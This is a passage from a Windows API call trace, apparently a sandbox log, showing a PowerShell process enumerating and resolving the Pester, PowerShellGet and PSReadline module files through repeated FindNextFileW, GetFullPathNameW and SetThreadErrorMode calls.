ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0171.199] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0171.199] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0171.199] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0171.199] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0171.200] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 0 [0171.200] FindClose (in: hFindFile=0x1e35146ae20 | out: hFindFile=0x1e35146ae20) returned 1 [0171.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c550) returned 1 [0171.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c510) returned 1 [0171.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c630) returned 1 [0171.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5f0) returned 1 [0171.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c680) returned 1 [0171.200] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.201] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0171.201] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0171.201] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0171.201] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0171.201] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0171.201] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0171.202] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0171.202] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0171.202] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0171.202] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0171.202] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0171.202] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0171.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5b0) returned 1 [0171.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c570) returned 1 [0171.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0171.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0171.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0171.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0171.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0171.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c830) returned 1 [0171.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c7f0) returned 1 [0171.203] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0171.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c5d0) returned 1 [0171.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c540) returned 1 [0171.207] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0171.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c620) returned 1 [0171.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c550) returned 1 [0171.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c510) returned 1 [0171.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c620) returned 1 [0171.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c550) returned 1 [0171.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c510) returned 1 [0171.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c630) returned 1 [0171.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5f0) returned 1 [0171.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c680) returned 1 [0171.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5b0) returned 1 [0171.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c570) returned 1 [0171.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0171.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0171.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0171.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0171.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0171.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c830) returned 1 [0171.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c7f0) returned 1 [0171.209] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0171.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c5d0) returned 1 [0171.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c540) returned 1 [0171.211] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0171.211] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c620) returned 1 [0171.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c550) returned 1 [0171.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c510) returned 1 [0171.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c620) returned 1 [0171.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c550) returned 1 [0171.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c510) returned 1 [0171.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c490) returned 1 [0171.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c3c0) returned 1 [0171.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c380) returned 1 [0171.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c490) returned 1 [0171.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c3c0) returned 1 [0171.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c380) returned 1 [0171.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c4a0) returned 1 [0171.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c460) returned 1 [0171.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c4f0) returned 1 [0171.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c420) returned 1 [0171.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c3e0) returned 1 [0171.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c630) returned 1 [0171.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5f0) returned 1 [0171.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c680) returned 1 [0171.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5b0) returned 1 [0171.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c570) returned 1 [0171.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0171.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0171.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0171.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0171.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0171.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c830) returned 1 [0171.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c7f0) returned 1 [0171.214] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0171.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c5d0) returned 1 [0171.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c540) returned 1 [0171.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c950) returned 1 [0171.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c910) returned 1 [0171.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c9a0) returned 1 [0171.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c8d0) returned 1 [0171.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c890) returned 1 [0171.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c940) returned 1 [0171.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c870) returned 1 [0171.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c830) returned 1 [0171.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c940) returned 1 [0171.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c870) returned 1 [0171.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c830) returned 1 [0171.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0171.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0171.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0171.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0171.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0171.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0171.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0171.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0171.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0171.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0171.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0171.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0171.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0171.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0171.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0171.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0171.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0171.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0171.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0171.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0171.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0171.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0171.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0171.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0171.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0171.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0171.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0171.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0171.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0171.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0171.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.222] SetThreadErrorMode 